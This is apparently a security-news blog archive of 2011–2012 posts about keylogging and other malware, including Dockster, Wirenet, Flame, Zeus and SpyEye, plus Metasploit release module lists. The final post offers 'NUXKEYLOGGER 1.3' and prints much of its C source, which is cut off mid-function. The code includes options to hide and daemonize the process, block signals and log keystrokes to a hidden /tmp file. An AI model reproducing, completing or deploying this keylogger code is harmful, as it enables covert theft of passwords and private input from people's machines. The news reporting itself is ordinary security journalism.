Showing posts sorted by date for query keylogger. Sort by relevance Show all posts
Showing posts sorted by date for query keylogger. Sort by relevance Show all posts

'Dockster' A New Mac Malware Targeting Apple Users Found on Dalai Lama Related Website

Posted by Avik Sarkar On 12/05/2012 07:33:00 pm

'Dockster' A New Mac Malware Targeting Apple Users Found on Dalai Lama Related Website

Researcher at F-Secure blog has identified that A new piece of malicious software targeted at Apple users has been found on a website dedicated to the Dalai Lama. According to blog post by F-Secure -the website related to Dalai Lama is fully compromised and is pushing new Mac malware, called Dockster, using a Java-based exploit. Dockster tries to infect computers by exploiting a vulnerability in Java, CVE-2012-0507. The vulnerability is the same one used by the Flashback malware, which first appeared around September 2011 and infected as many as 600,000 computers via a drive-by download. Flashback was used to fraudulently click on advertisements in order to generate illicit revenue in a type of scam known as click fraud. Apple patched the vulnerability in Java in early April and then undertook a series of steps to remove the frequently targeted application from Macs. Apple stopped bundling Java in the 10.7 version of its Lion operation system, which continued with the company's Mountain Lion release. In October, Apple removed older Java browser plug-ins in a software update.
But still the matter of relief is that current versions of OS X are not vulnerable; users who have disabled the Java browser plug-in are also not vulnerable. F-Secure researcher Sean Sullivan said Dockster is “a basic backdoor with file download and keylogger capabilities.” Meanwhile F-Secure’s Sullivan, also said that the Dalai Lama’s site is also serving a Windows-based exploit for CVE-2012-4681, the Agent.AXMO Trojan. The Trojan exploits a Java vulnerability that allows remote code execution using a malicious applet that is capable of bypassing the Java SecurityManager. 

Please Note That: The gyalwarinpoche.com site doesn't seem to be as "official" as dalailama.com

While talking about Mac malware, then you must remember that earlier also Mac users faced such attacks when mac Trojan OSX.SabPub was spreading through Java exploits In 2011 we have also seen OSX/Revir-B trojan was installed behind a PDF, and giving hackers remote access to MAC computers, not only Revier-B also Linux Tsunami trojan Called "Kaiten"targeted Mac OS users in 2011. Also another malware named "Devil Robber" which was also make MAC users victim while stealing their personal information. In the very decent past we have seen a trojan named 'BackDoor.Wirenet.1'  apparently providing its masters with a backdoor into infected systems. It is also capable of stealing passwords stored in browsers like ChromeChromium,Firefox and Opera. For any kind of cyber updates and infose news, stay tuned with VOGH.





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

'BackDoor.Wirenet.1' Trojan Stealing Passwords From Mac & Linux Based Systems

Posted by Avik Sarkar On 9/04/2012 03:34:00 pm


'BackDoor.Wirenet.1' Trojan Stealing  Passwords From Mac & Linux Based Systems

A Russian Anti Virus software company named 'Dr Web' has spotted a piece of malware that unusually targeting Macs and Linux-based systems is causing a world of trouble for those in its path. The newly found mlaware dubbed 'BackDoor.Wirenet.1' apparently providing its masters with a backdoor into infected systems. It is also capable of stealing passwords stored in browsers like Chrome, Chromium, Firefox and Opera. Furthermore, it’s also able to obtain passwords from popular applications including SeaMonkey, Pidgin and Thunderbird. Even if you don’t use any of the above mentioned software, you’re still in danger as a keylogger is bundled in the payload. Wirenet.1 installs itself into the user's home directory using the name WIFIADAPT

There are some steps that can be taken right away if you think you could be infected. Dr. Web is quick to point out that their anti-virus software will keep you protected. Another option is to simply disable communication with the control server used by the code’s author. In this case, blocking communication with IP address 212.7.208.65 should do the trick.  

Earlier also Mac users faced such attacks when mac Trojan OSX.SabPub was spreading through Java exploits In 2011 we have also seen OSX/Revir-B trojan was installed behind a PDF, and giving hackers remote access to MAC computers, not only Revier-B also Linux Tsunami trojan Called "Kaiten"targeted Mac OS users in 2011. Also another malware named "Devil Robber" which was also make MAC users victim while stealing their personal information




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Flame -The "Super Spy" Even On Offline Computers Turning Users into Data Mules

Posted by Avik Sarkar On 6/17/2012 02:48:00 am

Flame -The "Super Spy" Even On Offline Computers Turning Users into Data Mules

The program known as Flame has fascinated the cyber-security industry with its sophistication and versatility as a Swiss-Army knife of cyber-spying. Now researchers have discovered another unexpected tool in its data-stealing arsenal: You.
Malware analysts at the security firm Bitdefender say they’ve found a unique capability within Flame’s code that would potentially allow it to steal data even from computers that aren’t connected to the Internet or to other networked machines. Instead of simply uploading stolen data to a remote server as traditional spyware does, Flame can also move the target information–along with a copy of itself–onto a USB memory stick plugged into an infected machine, wait for an unwitting user to plug that storage device into an Internet-connected PC, infect the networked machine, copy the target data from the USB drive to the networked computer and finally siphon it to a faraway server.
Spreading itself over an infected USB device is hardly a new trick for malware. But Bitdefender’s researchers say they’ve never before seen a cyberespionage program that can also move its stolen digital booty onto the USB stick of an oblivious user and patiently wait for the opportunity to upload it to the malware’s controllers.
“It turns users into data mules,” says Bitdefender senior malware analyst Bogdan Botezatu. “Chances are, at some point, a user with an infected flash drive will plug it into a secure computer in a contained environment, and Flame will carry the target’s information from the protected environment to the outside world…It uses its ability to infect to ensure an escape route for the data. This is is somewhat revolutionary for a piece of malware.”
Flame was designed to use the same .lnk autorun vulnerability first exploited by the NSA-built Stuxnet malware to invisibly install itself on USB devices. To hide its trove of stolen data on the user’s device, Flame copies both itself and its data to a folder labelled with a single “.” symbol, which Windows fails to interpret as a folder name and thus renders as invisible to the user. “What we have here is a little hack/exploit performed on how the operating system is interpreting file names,” Bitdefender’s researchers wrote in a blog post on Flame last week.
When an infected USB is plugged into a networked machine, Flame checks that it can contact its command and control server through that computer. Then it moves its target data off the USB to the PC, compresses it, and sends it to the remote server via HTTPS, according to Bitdefender’s analysis. The researchers found that while Flame is capable of infecting networked PCs for the purpose of exfiltrating its data, the version they analyzed had rendered that infection capability inactive, perhaps to avoid the spyware spreading too far, so that only PCs already infected with Flame would be capable of acting as gateways back to the malware controller’s server. The fact that the spyware’s infection technique was turned off may be evidence that the “data mule” in the Flame operation may in fact have been aware of his or her role as an data smuggler.


Regardless, Botezatu says Flame’s USB-piggybacking trick fits with its profile as a highly sophisticated spying tool meant to steal a target’s most protected secrets–not just another cybercriminal keylogger designed to catch credit card numbers. “Most of the infrastructure it targets is highly contained, often without Internet access,” says Botezatu. “It’s natural for Flame to have a mechanism for moving data from one environment to another that doesn’t rely on Internet or network communications.” For additional details can be found here

-Source (Forbes)






SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

SpyEye Banking Trojan Swallowing US, Russia & Ukraine -Said AhnLab

Posted by Avik Sarkar On 3/30/2012 08:49:00 pm

SpyEye Banking Trojan Swallowing US, Russia & Ukraine -Said AhnLab 

Researcher at AhnLab has figure out a significant majority of the domains and hosts for the SpyEye Banking Trojan are in the US. The malicious code has gained attention as of late for the threat it poses to online banking user information. According to SpyEye-relevant host data extracted by the AhnLab Packet Center, 48% of all SpyEye domains were found to be located in the US, followed by Russia at 7%, and the Ukraine at 6%. The AhnLab Packet Center is the company’s malicious packet analysis system, which assesses suspicious packet data, including that from SpyEye C&C servers. The findings indicate that the main targets of SpyEye are mainly in the US, and that North American financial institutions and users should remain especially vigilant.
Since its toolkit first became public in 2010, the SpyEye Trojan has produced many variants. According to analysis by the AhnLab Packet Center, the “10310” variant was identified as the most distributed version at 34.5%. The “10299” and “10290” variants followed at 14.7% and 14.6%, respectively. Additional variants are expected in the future. SpyEye, along with ZeuS, are notorious banking Trojans that have helped thieves steal more than $100 million around the world. Without an end-user PC solution, banks face great difficulty protecting individual customers from the sophisticated threats posed by these malicious codes. AOS ensures comprehensive transaction security with its Anti-keylogger, Firewall and Anti-virus/spyware agents for individual user PCs, as well as Secure Browser which creates an independent online space for safe communication. With AOS’ unique approach to transaction security, banks are able to deliver complete peace of mind to their online customers.

The four components of the AhnLab Online Security (AOS) solution, designed to protect the entire transaction process, include:-
  • AOS Secure Browser: Provides a dedicated security browser that creates an independent and protected environment for online transactions. It secures user banking data against Man-In-The-Browser (MITB) attacks such as SpyEye and ZeuS, memory hacking, webpage alteration, HTML injection, cross-site scripting (XSS), browser help object (BHO) hacking, screen capturing, debugging, and reverse engineering.
  • AOS Anti-keylogger: Delivers the protection needed to keep account information safe and prevent theft of personal banking data during input via a keyboard.
  • AOS Firewall: Protects the user by detecting and blocking unauthorized intrusions and hacking attempts and preventing the leakage of personal information.
  • AOS Anti-virus/spyware: Secures online transactions against the latest malicious codes with AhnLab’s cloud based security technology known as ASD (AhnLab Smart Defense).
Yesterday we have discussed that Microsoft’s Digital Crimes Unit coordinated with several financial services organizations and the United States seized the two command-and-control servers of Zeus


-Source (Market-Watch)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Microsoft Seized Two Command & Control Server of Zeus Botnet

Posted by Avik Sarkar On 3/28/2012 12:42:00 am

Microsoft Seized Two Command & Control Server of Zeus Botnet 
Cyber crime investigator at Microsoft have shutdown two botnet server powered by "Zeus". It has been reported that Microsoft’s Digital Crimes Unit coordinated with several financial services organizations and the United States seized the two command-and-control servers of Zeus on Friday, March 23. After shutting down the servers, It has been found that more than $100 million have already been stolen and also an estimated 13 million computers ware infected and connected with those two CNC server of Zeus. The raid came after Microsoft filed a civil lawsuit, partly under the Racketeer Influenced and Corrupt Organizations Act. The company has combined legal tactics with cyberforensics three other times since 2010 to shut down command-and-control servers used to direct large botnets. Last week Microsoft officially declared that they are working closely with US authorities and financial services companies to disrupt two Zeus botnets. So there is no doubt that this is indeed a huge success for Microsoft. 
Brief Overview of Zeus Trojan:- 
The Zeus banking Trojan intercepted user credentials for online banking accounts with a keylogger and transferred money out of victims’ bank accounts. The malware was sophisticated enough to display a fake page showing the normal account balance instead of the actual amount, which meant victims weren’t aware of the thefts immediately. Zeus crimeware kits are available on underground forums for anywhere between $700 and $15,000. There’s even an “open source” version of the toolkit which is available for free.

"Cybercriminals have built hundreds of botnets using variants of Zeus malware," Richard Boscovich, a senior attorney with Microsoft’s Digital Crimes Unit, wrote on the Official Microsoft Blog.
Last week we have also discussed about another dangerous botnet or in other word the next generation cyber weapon named Duqu. After a decent period finally the researchers have solved the Duqu Mystery

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Metasploit 4.2.0 Released With IPv6 Support & Virtualization Target Coverage

Posted by Avik Sarkar On 2/24/2012 10:32:00 pm

Metasploit 4.2.0 Released With IPv6 Support & Virtualization Target Coverage
Earlier we haev discussed many times about one of the most famous and widely used exploitation framework named Metasploit. Yet again the Rapid 7 released another updated version of Metasploit. This update brings Metasploit to version 4.2.0, adding IPv6 support and virtualization target coverage. You'll also notice a new Product News section and update notification for our weekly updates. Since the last major release (4.1.0), added 54 new exploits, 66 new auxiliary modules, 43 new post-exploitation modules, and 18 new payloads. 
Brief About Metasploit:- 
The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task.
Module Changes:-
  •     Novell eDirectory eMBox Unauthenticated File Access
  •     JBoss Seam 2 Remote Command Execution
  •     NAT-PMP Port Mapper
  •     TFTP File Transfer Utility
  •     VMWare Power Off Virtual Machine
  •     VMWare Power On Virtual Machine
  •     VMWare Tag Virtual Machine
  •     VMWare Terminate ESX Login Sessions
  •     John the Ripper AIX Password Cracker
  •     7-Technologies IGSS 9 IGSSdataServer.exe DoS
  •     Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion
  •     DNS and DNSSEC fuzzer
  •     CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure
  •     CorpWatch Company ID Information Search
  •     CorpWatch Company Name Information Search
  •     General Electric D20 Password Recovery
  •     NAT-PMP External Address Scanner
  •     Shodan Search
  •     H.323 Version Scanner
  •     Drupal Views Module Users Enumeration
  •     Ektron CMS400.NET Default Password Scanner
  •     Generic HTTP Directory Traversal Utility
  •     Microsoft IIS HTTP Internal IP Disclosure
  •     Outlook Web App (OWA) Brute Force Utility
  •     Squiz Matrix User Enumeration Scanner
  •     Sybase Easerver 6.3 Directory Traversal
  •     Yaws Web Server Directory Traversal
  •     OKI Printer Default Login Credential Scanner
  •     MSSQL Schema Dump
  •     MYSQL Schema Dump
  •     NAT-PMP External Port Scanner
  •     pcAnywhere TCP Service Discovery
  •     pcAnywhere UDP Service Discovery
  •     Postgres Schema Dump
  •     SSH Public Key Acceptance Scanner
  •     Telnet Service Encyption Key ID Overflow Detection
  •     IpSwitch WhatsUp Gold TFTP Directory Traversal
  •     VMWare ESX/ESXi Fingerprint Scanner
  •     VMWare Authentication Daemon Login Scanner
  •     VMWare Authentication Daemon Version Scanner
  •     VMWare Enumerate Permissions
  •     VMWare Enumerate Active Sessions
  •     VMWare Enumerate User Accounts
  •     VMWare Enumerate Virtual Machines
  •     VMWare Enumerate Host Details
  •     VMWare Web Login Scanner
  •     VMWare Screenshot Stealer
  •     Capture: HTTP JavaScript Keylogger
  •     Oracle DB SQL Injection via SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION
  •     Asterisk Manager Login Utility
  •     FreeBSD Telnet Service Encryption Key ID Buffer Overflow
  •     Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
  •     Java Applet Rhino Script Engine Remote Code Execution
  •     Family Connections less.php Remote Command Execution
  •     Gitorious Arbitrary Command Execution
  •     Horde 3.3.12 Backdoor Arbitrary PHP Code Execution
  •     OP5 license.php Remote Command Execution
  •     OP5 welcome Remote Command Execution
  •     Plone and Zope XMLTools Remote Command Execution
  •     PmWiki <= 2.2.34 pagelist.php Remote PHP Code Injection Exploit
  •     Support Incident Tracker <= 3.65 Remote Command Execution
  •     Splunk Search Remote Code Execution
  •     Traq admincp/common.php Remote Code Execution
  •     vBSEO <= 3.6.0 proc_deutf() Remote PHP Code Injection
  •     Mozilla Firefox 3.6.16 mChannel Use-After-Free
  •     CTEK SkyRouter 4200 and 4300 Command Execution
  •     Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
  •     Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute
  •     HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution
  •     Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control
  •     Java MixerSequencer Object GM_Song Structure Handling Vulnerability
  •     MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
  •     MS12-004 midiOutPlayNextPolyEvent Heap Overflow
  •     Viscom Software Movie Player Pro SDK ActiveX 6.8
  •     Adobe Reader U3D Memory Corruption Vulnerability
  •     Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow
  •     BS.Player 2.57 Buffer Overflow
  •     CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow
  •     Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow
  •     McAfee SaaS MyCioScan ShowReport Remote Command Execution
  •     Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow
  •     MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow
  •     Ability Server 2.34 STOR Command Stack Buffer Overflow
  •     AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow
  •     Serv-U FTP Server < 4.2 Buffer Overflow
  •     HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow
  •     XAMPP WebDAV PHP Upload
  •     Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow
  •     Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow
  •     HP Diagnostics Server magentservice.exe Overflow
  •     StreamDown 6.8.0 Buffer Overflow
  •     Wireshark console.lua Pre-Loading Script Execution
  •     Oracle Job Scheduler Named Pipe Command Execution
  •     SCADA 3S CoDeSys CmpWebServer <= v3.4 SP4 Patch 2 Stack Buffer Overflow
  •     Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57
  •     OpenTFTP SP 1.4 Error Packet Overflow
  •     AIX Gather Dump Password Hashes
  •     Linux Gather Saved mount.cifs/mount.smbfs Credentials
  •     Multi Gather VirtualBox VM Enumeration
  •     UNIX Gather .fetchmailrc Credentials
  •     Multi Gather VMWare VM Identification
  •     UNIX Gather .netrc Credentials
  •     Multi Gather Mozilla Thunderbird Signon Credential Collection
  •     Multiple Linux / Unix Post Sudo Upgrade Shell
  •     Windows Escalate SMB Icon LNK dropper
  •     Windows Escalate Get System via Administrator
  •     Windows Gather RazorSQL Credentials
  •     Windows Gather File and Registry Artifacts Enumeration
  •     Windows Gather Enumerate Computers
  •     Post Windows Gather Forensics Duqu Registry Check
  •     Windows Gather Privileges Enumeration
  •     Windows Manage Download and/or Execute
  •     Windows Manage Create Shadow Copy
  •     Windows Manage List Shadow Copies
  •     Windows Manage Mount Shadow Copy
  •     Windows Manage Set Shadow Copy Storage Space
  •     Windows Manage Get Shadow Copy Storage Info
  •     Windows Recon Computer Browser Discovery
  •     Windows Recon Resolve Hostname
  •     Windows Gather Wireless BSS Info
  •     Windows Gather Wireless Current Connection Info
  •     Windows Disconnect Wireless Connection
  •     Windows Gather Wireless Profile
For additional information click Here. To Download Metasploit version 4.2.0 for windows & Linux click Here.

 -Source (rapid7)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Facebook Malware Turns Your Profile Picture Pink (Spying Keystrokes & Stealing Passwords)

Posted by Avik Sarkar On 10/26/2011 09:54:00 pm



Did you notice that the profile pics of some of your Facebook friends have acquired a pink tinge? Rumours have hit the social networking site that the Facebook app that turns your profile picture pink carries "keylogger malware" that can spy on your keypresses, and steal your passwords - not just from Facebook, but from online banks you may log into as well.
Here is a Demo of the Facebook Warning:-
ABC News 24 just released a statement about a virus on facebook app that adds a pink tinge to your profile picture to `raise money for cancer`. Be aware this fake third-party app installs a virus on the machine you used to access the app. Apparently its a keylogger malware that searches for bank details and passwords etc. Facebook allows keylogger in its apps to aid predictive search algorithms, and therefore the virus hasnt been picked up. Keep a look out for any of your friends who may have fallen victim to this app. Apparently, they should be easily identifiable with a pink tinge to their profile picture. 
However, the warning is balderdash. ABC News has released no such warning, the app is not malicious and we have seen no evidence that it contains a keylogger. The truth is that your Facebook friends are doing something positive - helping raise money and awareness for the fight against breast cancer. Australian bank CUA raises funds every October for Breast Cancer Awareness Month, and this year decided to share an app that would change users' profile pictures pink to show that they were supporting the campaign.


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Stealthy Keylogger Malware Infected U.S. Drone Fleet & Gained Remote Access on Their Flying Missions

Posted by Avik Sarkar On 10/10/2011 05:45:00 pm



A computer virus has infected the cockpits of America’s Predator and Reaper drones, logging pilots’ every keystroke as they remotely fly missions over Afghanistan and other warzones.
The virus, first detected nearly two weeks ago by the military’s Host-Based Security System, has not prevented pilots at Creech Air Force Base in Nevada from flying their missions overseas. Nor have there been any confirmed incidents of classified information being lost or sent to an outside source. But the virus has resisted multiple efforts to remove it from Creech’s computers, network security specialists say. And the infection underscores the ongoing security risks in what has become the U.S. military’s most important weapons system.
“We keep wiping it off, and it keeps coming back,” says a source familiar with the network infection, one of three that told Danger Room about the virus. “We think it’s benign. But we just don’t know.”
Military network security specialists aren’t sure whether the virus and its so-called “keylogger” payload were introduced intentionally or by accident; it may be a common piece of malware that just happened to make its way into these sensitive networks. The specialists don’t know exactly how far the virus has spread. But they’re sure that the infection has hit both classified and unclassified machines at Creech. That raises the possibility, at least, that secret data may have been captured by the keylogger, and then transmitted over the public internet to someone outside the military chain of command.


-News Source (Wired)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

USAToday Twitter Account Hacked By Script Kiddies

Posted by Avik Sarkar On 9/26/2011 04:11:00 pm


The Script Kiddies, which is the same group that recently hacked the NBC Twitter account, struck again Sunday evening. The hacker group, which hacked the @USAToday Twitter account late Sunday evening, used the account to send out spiteful messages daring Twitter to block them again. They also asked Twitter users to vote for what account they should hack next in the tweet below:
“Fox News, Wal-mart, Unilevel, Pfizer, NBC and now USA Today. who’s next? Vote Now!”
The Script Kiddies are the lesser-known splinter group of the famous Anonymous hacking group. On the tenth anniversary of the 9/11 terrorist attack, the Script Kiddies hacked the @NBCNews Twitter account and falsely tweeted that a plane had crashed into ground zero. In addition, in July, they hacked the @FoxNewsPolitics Twitter account and falsely tweeted that President Obama had been assassinated. The FBI
In the past, The Script Kiddies have used a “keylogger Trojan” to access the official Twitter accounts of news organizations. The computer malware is unknowingly installed on the host’s computer and logs the entries a computer user makes and in turn allows the hacker to easily detect passwords. Early evidence points to a high likelihood that the group used the same tactic to gain access to the USA Today Twitter account.
USA Today has worked with Twitter to regain control of their account and recently tweeted:
 
“@usatoday was hacked and as a result false tweets were sent. We Worked with Twitter to correct it. The account is now back in our control.”



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Famous Framework Metasploit v4.0.0

Posted by Avik Sarkar On 8/04/2011 06:55:00 pm

The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task.

New Exploit Modules:

VSFTPD v2.3.4 Backdoor Command Execution
Java RMI Server Insecure Default Configuration Java Code Execution
HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow
Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability
Black Ice Cover Page ActiveX Control Arbitrary File Download
Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability
MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
Lotus Notes 8.0.x – 8.5.2 FP2 – Autonomy Keyview
RealWin SCADA Server DATAC Login Buffer Overflow
Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow
Iconics GENESIS32 Integer overflow version 9.21.201.01
Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
Sielco Sistemi Winlog Buffer Overflow
Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
HP OmniInet.exe Opcode 20 Buffer Overflow
HP OmniInet.exe Opcode 27 Buffer Overflow
Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow
Lotus Notes 8.0.x – 8.5.2 FP2 – Autonomy Keyview

New Post-Exploitation Modules:

Winlogon Lockout Credential Keylogger
Windows Gather Microsoft Outlook Saved Password Extraction
Windows Gather Process Memory Grep
Windows Gather Trillian Password Extractor
Windows PCI Hardware Enumeration
Windows Gather FlashFXP Saved Password Extraction
Windows Gather Local and Domain Controller Account Password Hashes
Windows Gather Nimbuzz Instant Messenger Password Extractor
Windows Gather CoreFTP Saved Password Extraction
Internet Download Manager (IDM) Password Extractor
Windows Gather SmartFTP Saved Password Extraction
Windows Gather Bitcoin wallet.dat
Windows Gather Service Info Enumeration
Windows Gather IPSwitch iMail User Data Enumeration

New Auxiliary Modules:

John the Ripper Password Cracker Fast Mode
Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
Kaillera 0.86 Server Denial of Service
2Wire Cross-Site Request Forgery Password Reset Vulnerability
SIPDroid Extension Grabber
MSSQL Password Hashdump

Notable Features & Closed Bugs:-

Feature #4982 – Support for custom executable with psexec
Feature #4856 – RegLoadKey and RegUnLoadKey functions for the Meterpreter stdapi
Feature #4578 – Update Nmap XML parsers to support Nokogiri parsing
Feature #4417 – Post exploitation module to harvest OpenSSH credentials
Feature #4015 – Increase test coverage for railgun
Bug #4963 – Rework db_* commands for consistency
Bug #4892 – non-windows meterpreters upload into the wrong filename
Bug #4296 – Meterpreter stdapi registry functions create key if one doesn’t exist
Bug #3565 – framework installer fails on RHEL (postgres taking too long to start)

Armitage integrates with Metasploit 4.0 to:-

Take advantage of the new Meterpreter payload stagers
Crack credentials with the click of a button
Run post modules against multiple hosts
Automatically log all post-exploitation activity
Revision Information:
Framework Revision 13462
Several import parsers were rewritten to use Nokogiri for much faster processing of large import files. Adding to Metasploit’s extensive payload support, Windows and Java Meterpreter now both support staging over HTTP and Windows can use HTTPS. In a similar vein, POSIX Meterpreter is seeing some new development again. It still isn’t perfect nor is it nearly as complete as the Windows version, but many features already work. Java applet signing is now done directly in Ruby, removing the need for a JDK for generating self-signed certificates. The Linux installers now ship with ruby headers, making it possible to install native gems in the Metasploit ruby environment.

Another flexibility improvement comes in the form of a consolidated pcap interface. The pcaprub extension ships with the Linux installers as of this release and support for Windows will come soon. Modules that used Racket for generating raw packets have been converted to Packetfu, which provides a smoother API for modules to capture and inject packets.

To download Metasploit Framework v4.0.0 Click Here
For more information abous MSF click here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

NUXKEYLOGGER VERSION 1.3 (Key Logger For LINUX)

Posted by Avik Sarkar On 7/10/2011 09:49:00 pm


NUXKEYLOGGER VERSION 1.3  is an effective Key Logger For LINUX systems. 

Brief Description:- 
Nux Keylogger monitors keyboard activity on a Linux system.  It's possible to hide and daemonize this process and it supports azerty and qwerty keyboard modes.

Author:- Vilmain Nicolas (C) 2010, 2011 (null.sim@gmail.com)

Licence:-


This program is free software: you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation, either version 3 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program.  If not, see <http://www.gnu.org/licenses/>.


Source Code of Nuxkeylogger Version 1.3:-

#include  <fcntl.h>
#include  <errno.h>
#include  <stdio.h>
#include  <unistd.h>
#include  <getopt.h>
#include  <stdlib.h>
#include  <string.h>
#include  <signal.h>
#include  <dirent.h>
#include  <sys/select.h>
#include  <linux/input.h>

#define DF_PATH_LOG             "/tmp/.Xsys"
#define PATH_KEYBOARD_FILE      "/dev/input/by-path/"
#define VERSION_STR             "nuxkeylogger version 1.3"
#define PATH_LEN                1024

#define  SIZE_TAB_KEY_AZERTY   sizeof (tab_key_azerty)
#define  SIZE_TAB_KEY_QWERTY   sizeof (tab_key_qwerty)

struct fdlist_s
  {
    int *fdtab;
    int n;
    int *p_lastfd;
    int fdlog;
  };

void    checkuid (void);
void    decode_nuxkeylogger_options (int argc, char **argv, char **pathlog);
void    version (void);
void    usage (void);
void    out_memory (const char *type);
char *  xstrdup (const char *str);
void    hide (int argc, char **argv, const char *name);
void    block_signal (void);
void    daemonize (void);
int     get_keyboard_fd (struct fdlist_s *fl);
int     open_fd_log (char *pathlog, int *fd);
void    loop_keyboard_key (struct fdlist_s *fl);
int     write_key (int fd, int fdlog);
void    free_fdlist (struct fdlist_s *fl);

static const char *tab_key_azerty[] =
  {
     "<ESC>", "&", "é", "\"", "'", "(", "-", "è", "_",
     "ç", "à ", ")", "=", "<BACKSPACE>", "<TAB>", "a",
     "z", "e", "r", "t", "y", "u", "i", "o","p", "^",
     "$", "<ENTER>\n", "<CTRL>", "q", "s", "d", "f", "g", "h",
     "j", "k", "l", "m", "ù", "²", "<SHIFT>", "*", "w",
     "x", "c", "v", "b", "n", ",", ";", ":", "!", "<SHIFT>",
     "*", "<ALT>", " ", "", "<F1>", "<F2>", "<F4>",
     "<F5>", "<F6>", "<F7>", "<F8>", "<F9>", "<F10>", "",
     "<VerNum>", "", "7", "8", "9", "-", "4", "5", "6",
     "+", "1", "2", "3", "0", "<?>", "", "", "<", "<F11>",
     "<F12>", "", "", "", "", "", "", "", "", "", "/", "",
     "<ALTGr>", "", "", "<Up>", "<UP>", "<Left>", "<Right>",
     "<END>", "<Down>", "<DOWN>", "", "<DEL>", "", "", "",
     "", "", "", "", "", "", "", "", "", "", "<META>"
  };

static const char *tab_key_qwerty[] =
  {
    "<ESC>", "!", "@", "#", "$", "%", "^", "&", "*",
    "(", ")", "_", "=", "<BACKSPACE>", "<TAB>", "q",
    "w", "e", "r", "t", "y", "u", "i", "o", "p",
    "[", "]", "<ENTER>\n", "<CTRL-LEFT>", "a", "s", "d",
    "f", "g", "h", "j", "k", "l", ";", "'", "`", "",
    "\\", "z", "x", "c", "v", "b", "n", "m", ",", "",
    "", "", "", "ALT", " ", "", "<F1>", "<F2>", "<F3>",
    "<F4>", "<F5>", "<F6>", "<F7>", "<F8>", "<F9>", "<F10>",
    "", "", "7","8", "9", "-", "4", "5", "6", "+", "1", "2",
    "3", "0", ".", "", "", "<", "<F11>", "<F12>", "", "",
    "", "", "", "", "", "<ENTER-RIGHT>", "<CTRL-RIGHT>", "",
    "", "<AltGR>",  "", "", "<Up>", "", "<LEFT>", "", "<RIGHT>",
    "", "<DOWN>", "", "", "", "", "", "", "", ""
  };

char **tab_key;

int
main (int argc, char **argv)
{
  struct fdlist_s fl;
  char *pathlog = NULL;

  checkuid ();
  memset (&fl, 0, sizeof (struct fdlist_s));
  fl.fdlog = -1;
  tab_key = (char **) tab_key_azerty;
  decode_nuxkeylogger_options (argc, argv, &pathlog);
  if (get_keyboard_fd (&fl)
      || open_fd_log (pathlog, &fl.fdlog) == -1)
    {
      free_fdlist (&fl);
      return EXIT_FAILURE;
    }
  loop_keyboard_key (&fl);
  free_fdlist (&fl);
  return EXIT_SUCCESS;
}

void
checkuid (void)
{
  if (getuid ())
    {
      fprintf (stderr, "WARNING: need root!\n");
      exit (EXIT_SUCCESS);
    }
}


void
decode_nuxkeylogger_options (int argc, char **argv, char **pathlog)
{
  char   opt;
  char   *name = NULL;
  static struct option const long_options[] =
    {
      {"help",           no_argument, 0,        'h'},
      {"version",        no_argument, 0,        'v'},
      {"daemonize",      no_argument, 0,        'd'},
      {"block-signals",  no_argument, 0,        's'},
      {"mode-qwerty",    no_argument, 0,        'Q'},
      {"mode-azerty",    no_argument, 0,        'A'},
      {"hidden",         required_argument, 0,  'i'},
      {"path-log",       required_argument, 0,  'p'},
      {0,                0,                 0,   0}
    };

  do
    {
      opt = getopt_long (argc, argv, "hvdsAQi:p:", long_options, NULL);
      switch (opt)
    {
    case 'h':
      usage ();
      break;
    case 'v':
      version ();
